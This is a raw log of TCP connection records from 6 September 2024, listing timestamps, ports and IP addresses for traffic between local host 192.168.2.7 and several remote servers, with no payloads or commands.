Sep 6, 2024 09:58:52.536359072 CEST	80	49833	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:52.934055090 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:52.938895941 CEST	80	49825	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:53.175884008 CEST	80	49825	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:53.226322889 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:53.232656002 CEST	80	49833	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:53.232714891 CEST	49833	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:53.233442068 CEST	49833	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:53.238189936 CEST	80	49833	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:53.449624062 CEST	49835	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:53.449676991 CEST	443	49835	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:53.457703114 CEST	49835	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:53.457879066 CEST	49835	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:53.457890987 CEST	443	49835	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:53.461472988 CEST	80	49833	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:53.462547064 CEST	49833	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:53.574132919 CEST	49831	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:53.579330921 CEST	80	49831	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:53.587404013 CEST	49833	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:53.588241100 CEST	49837	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:53.592490911 CEST	80	49833	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:53.593128920 CEST	80	49837	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:53.595972061 CEST	49833	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:53.596031904 CEST	49837	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:53.598987103 CEST	49837	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:53.604082108 CEST	80	49837	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:53.643899918 CEST	49838	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:53.643959999 CEST	443	49838	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:53.653687000 CEST	49838	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:53.655292988 CEST	49838	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:53.655306101 CEST	443	49838	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:53.668708086 CEST	80	49831	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:53.713192940 CEST	49831	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:53.725518942 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:53.725518942 CEST	49831	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:53.730998993 CEST	80	49825	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:53.731038094 CEST	80	49831	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:53.734427929 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:53.734427929 CEST	49831	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:53.737859011 CEST	49839	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:53.737894058 CEST	443	49839	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:53.739228010 CEST	49839	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:53.740695953 CEST	49839	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:53.740710020 CEST	443	49839	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:53.915235996 CEST	443	49835	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:53.915246010 CEST	443	49835	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:53.915389061 CEST	49835	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:53.918328047 CEST	49835	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:53.918337107 CEST	443	49835	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:53.918593884 CEST	443	49835	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:53.920979977 CEST	49835	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:53.921052933 CEST	49835	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:53.921160936 CEST	443	49835	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:53.921226978 CEST	49835	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:54.107485056 CEST	49841	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.107531071 CEST	443	49841	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:54.107841015 CEST	49841	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.107964993 CEST	49841	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.107975006 CEST	443	49841	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:54.150657892 CEST	443	49838	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.150666952 CEST	443	49838	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.150765896 CEST	49838	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.155471087 CEST	49838	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.155486107 CEST	443	49838	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.155585051 CEST	49838	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.155657053 CEST	443	49838	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.155965090 CEST	49842	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.155999899 CEST	443	49842	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.156039000 CEST	49838	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.159167051 CEST	49842	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.160583973 CEST	49842	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.160599947 CEST	443	49842	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.218734026 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:54.223522902 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:54.226114988 CEST	443	49839	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.228296041 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:54.228411913 CEST	49839	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.232306004 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:54.234209061 CEST	49839	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.234219074 CEST	443	49839	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.234317064 CEST	49839	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.234467983 CEST	443	49839	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.234687090 CEST	49845	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.234719992 CEST	443	49845	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.235551119 CEST	49839	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.235594988 CEST	49845	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.237066031 CEST	49845	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.237076998 CEST	443	49845	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.237104893 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:54.293165922 CEST	80	49837	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:54.293801069 CEST	49837	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:54.294322968 CEST	49837	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:54.299083948 CEST	80	49837	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:54.523551941 CEST	80	49837	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:54.523628950 CEST	49837	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:54.584281921 CEST	443	49841	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:54.584361076 CEST	49841	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.626699924 CEST	443	49842	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.626776934 CEST	49842	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.630098104 CEST	49837	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:54.630404949 CEST	49846	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:54.635185957 CEST	80	49837	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:54.635221004 CEST	80	49846	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:54.635251045 CEST	49837	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:54.635334015 CEST	49846	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:54.635510921 CEST	49846	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:54.640270948 CEST	80	49846	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:54.672713041 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:54.701642036 CEST	443	49845	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.701915979 CEST	49845	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.711730957 CEST	49841	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.711755037 CEST	443	49841	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:54.712105036 CEST	443	49841	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:54.719183922 CEST	49841	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.719378948 CEST	443	49841	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:54.719482899 CEST	49841	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.719491005 CEST	443	49841	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:54.719870090 CEST	49847	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.719898939 CEST	443	49847	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:54.719964981 CEST	49842	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.719973087 CEST	443	49842	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.720057964 CEST	49842	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.720122099 CEST	49845	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.720122099 CEST	49845	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.720141888 CEST	443	49845	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.720174074 CEST	443	49842	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.720321894 CEST	443	49845	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.720431089 CEST	49842	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.720447063 CEST	49847	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.720577955 CEST	49847	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.720585108 CEST	443	49847	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:54.722507000 CEST	49845	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.729633093 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:54.928500891 CEST	443	49841	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:54.929126978 CEST	49848	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.929172993 CEST	443	49848	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.929425955 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:54.930330038 CEST	49841	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:54.930355072 CEST	49848	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.931802034 CEST	49848	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:54.931814909 CEST	443	49848	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:54.934302092 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:54.945884943 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:54.946131945 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:54.950880051 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:55.054898024 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:55.059864044 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:55.149589062 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:55.178658962 CEST	443	49847	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:55.184262037 CEST	49847	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:55.188169003 CEST	49847	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:55.188183069 CEST	443	49847	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:55.188452005 CEST	443	49847	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:55.191282988 CEST	49847	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:55.191369057 CEST	49847	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:55.191454887 CEST	443	49847	34.160.144.191	192.168.2.7
Sep 6, 2024 09:58:55.194653988 CEST	49847	443	192.168.2.7	34.160.144.191
Sep 6, 2024 09:58:55.199882984 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:55.334207058 CEST	80	49846	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:55.334451914 CEST	49846	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:55.335114002 CEST	49846	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:55.339943886 CEST	80	49846	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:55.394378901 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:55.414665937 CEST	443	49848	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:55.414758921 CEST	49848	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:55.447360992 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:55.461303949 CEST	49848	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:55.461328983 CEST	443	49848	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:55.461416960 CEST	49848	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:55.461935997 CEST	49850	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:55.461971045 CEST	443	49850	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:55.462158918 CEST	49850	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:55.462220907 CEST	443	49848	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:55.462980986 CEST	49848	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:55.463732958 CEST	49850	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:55.463752985 CEST	443	49850	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:55.566302061 CEST	80	49846	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:55.566376925 CEST	49846	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:55.680155039 CEST	49846	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:55.680532932 CEST	49851	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:55.685318947 CEST	80	49846	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:55.685507059 CEST	80	49851	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:55.693574905 CEST	49846	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:55.693908930 CEST	49851	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:55.724023104 CEST	49851	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:55.729018927 CEST	80	49851	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:55.945683956 CEST	443	49850	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:55.946873903 CEST	49850	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:55.951719046 CEST	49850	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:55.951728106 CEST	443	49850	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:55.951844931 CEST	49850	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:55.951935053 CEST	443	49850	34.117.188.166	192.168.2.7
Sep 6, 2024 09:58:55.952024937 CEST	49850	443	192.168.2.7	34.117.188.166
Sep 6, 2024 09:58:56.260695934 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:56.261508942 CEST	49852	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:58:56.261557102 CEST	443	49852	34.107.243.93	192.168.2.7
Sep 6, 2024 09:58:56.262034893 CEST	49852	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:58:56.263515949 CEST	49852	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:58:56.263534069 CEST	443	49852	34.107.243.93	192.168.2.7
Sep 6, 2024 09:58:56.265508890 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:56.318696976 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:56.323559999 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:56.355680943 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:56.398051977 CEST	80	49851	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:56.403709888 CEST	49851	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:56.408277988 CEST	49851	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:56.413243055 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:56.413332939 CEST	80	49851	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:56.419274092 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:56.466170073 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:56.635898113 CEST	80	49851	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:56.635967016 CEST	49851	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:56.730552912 CEST	443	49852	34.107.243.93	192.168.2.7
Sep 6, 2024 09:58:56.730628967 CEST	49852	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:58:56.761528969 CEST	49851	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:56.761843920 CEST	49853	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:56.766710997 CEST	80	49851	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:56.767071009 CEST	49851	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:56.767132998 CEST	80	49853	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:56.767469883 CEST	49853	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:56.767987967 CEST	49853	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:56.772787094 CEST	80	49853	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:56.946043968 CEST	49852	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:58:56.946069956 CEST	443	49852	34.107.243.93	192.168.2.7
Sep 6, 2024 09:58:56.946115971 CEST	49852	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:58:56.946393967 CEST	443	49852	34.107.243.93	192.168.2.7
Sep 6, 2024 09:58:56.946552038 CEST	49852	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:58:56.952691078 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:56.957475901 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:57.025759935 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:57.030680895 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:57.047287941 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:57.091003895 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:57.120505095 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:57.169163942 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:57.170998096 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:57.175852060 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:57.265746117 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:57.307336092 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:57.477562904 CEST	49854	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:57.477607965 CEST	443	49854	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:57.484199047 CEST	49854	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:57.484313011 CEST	49854	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:57.484327078 CEST	443	49854	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:57.491254091 CEST	80	49853	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:57.491317034 CEST	49853	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:57.492048979 CEST	49853	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:57.497245073 CEST	80	49853	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:57.498517036 CEST	49855	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:57.498553038 CEST	443	49855	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:57.498975039 CEST	49855	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:57.500330925 CEST	49855	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:57.500340939 CEST	443	49855	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:57.724163055 CEST	80	49853	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:57.724370003 CEST	49853	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:57.841181040 CEST	49853	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:57.841509104 CEST	49857	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:57.846307993 CEST	80	49857	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:57.846539974 CEST	80	49853	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:57.846621990 CEST	49853	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:57.846637011 CEST	49857	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:57.846756935 CEST	49857	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:57.851479053 CEST	80	49857	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:57.863903046 CEST	49858	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:57.863944054 CEST	443	49858	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:57.864470005 CEST	49858	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:57.866385937 CEST	49858	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:57.866400957 CEST	443	49858	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:57.938946009 CEST	443	49854	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:57.938965082 CEST	443	49854	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:57.939037085 CEST	49854	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:57.942140102 CEST	49854	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:57.942156076 CEST	443	49854	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:57.942406893 CEST	443	49854	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:57.945089102 CEST	49854	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:57.945177078 CEST	49854	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:57.945256948 CEST	443	49854	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:57.946722031 CEST	49854	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:57.957329988 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:57.963149071 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:57.991579056 CEST	443	49855	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:57.993763924 CEST	49855	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:57.999026060 CEST	49855	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:57.999047995 CEST	443	49855	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:57.999110937 CEST	49855	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:57.999272108 CEST	443	49855	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:57.999324083 CEST	49855	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.052850962 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:58.062472105 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:58.067261934 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:58.073168039 CEST	49859	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.073206902 CEST	443	49859	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:58.073668957 CEST	49859	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.075062990 CEST	49859	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.075079918 CEST	443	49859	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:58.099737883 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:58.157038927 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:58.207968950 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:58.343161106 CEST	443	49858	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:58.343236923 CEST	49858	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.378791094 CEST	49858	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.378817081 CEST	443	49858	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:58.378937006 CEST	49858	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.379112959 CEST	443	49858	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:58.379340887 CEST	49860	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.379369974 CEST	443	49860	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:58.379395008 CEST	49858	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.380847931 CEST	49860	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.382294893 CEST	49860	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.382308960 CEST	443	49860	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:58.504743099 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:58.509504080 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:58.540326118 CEST	80	49857	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:58.541088104 CEST	49857	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:58.542036057 CEST	49857	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:58.547049999 CEST	80	49857	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:58.557362080 CEST	443	49859	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:58.557470083 CEST	49859	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.561657906 CEST	49859	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.561678886 CEST	443	49859	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:58.561757088 CEST	49859	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.561878920 CEST	443	49859	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:58.562230110 CEST	49859	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.566287041 CEST	49861	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.566327095 CEST	443	49861	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:58.567284107 CEST	49861	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.568721056 CEST	49861	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:58.568748951 CEST	443	49861	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:58.599050045 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:58.602226973 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:58.607506037 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:58.641326904 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:58.697249889 CEST	80	49849	34.107.221.82	192.168.2.7
